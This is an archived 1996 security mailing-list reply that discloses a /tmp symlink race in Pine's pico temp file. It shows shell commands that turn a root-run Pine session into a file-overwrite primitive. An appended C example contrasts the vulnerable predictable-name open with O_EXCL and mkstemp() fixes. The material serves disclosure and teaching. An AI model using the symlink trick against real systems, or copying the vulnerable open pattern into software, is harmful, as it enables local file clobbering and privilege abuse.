Bugtraq: Re: [linux-security] Pine security problem

Re: [linux-security] Pine security problem

From: Ranaur, the Elven Warlock! <ranaur_at_rdc.puc-rio.br>
Date: Thu, 12 Sep 1996 22:09:59 -0300

On Thu, 12 Sep 1996, Pascal A. Dupuis wrote:

> I tried with my system, running Pine3.95 on Linux 2.0.18.
> A) I started composing a message, invoked the alternate editor (with
> Linux and a French keyboard, the command is ^), ??? ). From another login
> name, I do :
> cd /tmp
> ln -s pico.pid hacker.tmp
> more hacker.tmp -> permission denied !
> B) I started the other way :
> first, from the other login
> ln -s hacker.tmp pico.pid
> Then, start composing a message. Invoking the alternate command resulted
> in the error message : "Problem creating pico temp file", and I was unable
> to use the alternate editor.
> On the Linux system, the /tmp/pico.pid file is created 600, owned by the
> Pine user. At first glance, this should be safe, isn't it ?
>
        No.

        I ran it on PINE 3.91 ... see on ... (sorry, I ran it as root ;)

root_at_galadriel:/tmp# ln -s t pico.238
root_at_galadriel:/tmp# touch t
root_at_galadriel:/tmp# chown 666 t
root_at_galadriel:/tmp# ls -l
lrwxrwxrwx 1 root root 1 Sep 12 22:00 pico.238 -> t*
-rw-rw-rw- 1 root root 0 Sep 12 22:01 t*
        (ran pine (with ranaur) ... answering this message and ^_ to
it ... ;)

        so ... abracadabra ...

-rw-rw-rw- 1 root root 2366 Sep 12 22:06 t

        Well ... it's a problem ... if the evil guy is smart enough he
can check the root running pine and trash a file in the system ... (the
odds are few, but, let me be paranoid ;) )

        Any suggestions?

    Ainur ‰a Valar!
        Ranaur

         . . . . . . . . . . . . . . . . . . . . . . . . . .
            . . . . . . Ranaur, the Elven Warlock ! . . . . . .
               . . E-mail ranaur_at_rdc.puc-rio.br ranaur_at_usa.net . .
            . . Look! . http://venus.rdc.puc-rio.br/ranaur/ . .
         . . . . . . . . . . . . . . . . . . . . . . . . . .
Received on Sep 12 1996
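
Added example, not part of the original post or of Pine's code: the predictable-name open the thread describes, next to an exclusive create and mkstemp(), replayed inside a private scratch directory. The function names, the scratch directory and the 11-byte sample text are constructed for illustration.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern the thread describes: predictable name, no O_EXCL, so an
 * existing symlink is followed and its target is truncated and written. */
static int open_predictable(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: O_CREAT|O_EXCL fails with EEXIST if the name already exists,
 * including when it is a symlink (dangling or not). */
static int open_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Replays the setup inside a private scratch directory (constructed paths).
 * Result bits: 1 = write via the symlink landed in "t", 2 = O_EXCL refused
 * the symlink, 4 = mkstemp() made a fresh regular file. -1 = setup error. */
int symlink_demo(void) {
    char dir[] = "/tmp/symdemoXXXXXX", target[64], lnk[64], safe[64];
    struct stat st;
    int result = 0, fd;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/t", dir);
    snprintf(lnk, sizeof lnk, "%s/pico.238", dir);
    snprintf(safe, sizeof safe, "%s/pico.XXXXXX", dir);
    if ((fd = open(target, O_WRONLY | O_CREAT, 0666)) < 0) return -1;
    close(fd);
    if (symlink("t", lnk) != 0) return -1;
    if ((fd = open_predictable(lnk)) >= 0) {
        ssize_t n = write(fd, "draft text\n", 11);
        close(fd);
        if (n == 11 && stat(target, &st) == 0 && st.st_size == 11) result |= 1;
    }
    fd = open_exclusive(lnk);
    if (fd < 0 && errno == EEXIST) result |= 2;
    if (fd >= 0) close(fd);
    if ((fd = mkstemp(safe)) >= 0) {
        if (lstat(safe, &st) == 0 && S_ISREG(st.st_mode)) result |= 4;
        close(fd); unlink(safe);
    }
    unlink(lnk); unlink(target); rmdir(dir);
    return result;
}
int main(void) { printf("result bits: %d\n", symlink_demo()); return 0; }
```

On current Linux kernels the fs.protected_symlinks sysctl also restricts following such links in sticky world-writable directories like /tmp, but portable code should rely on the exclusive create rather than on that setting.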
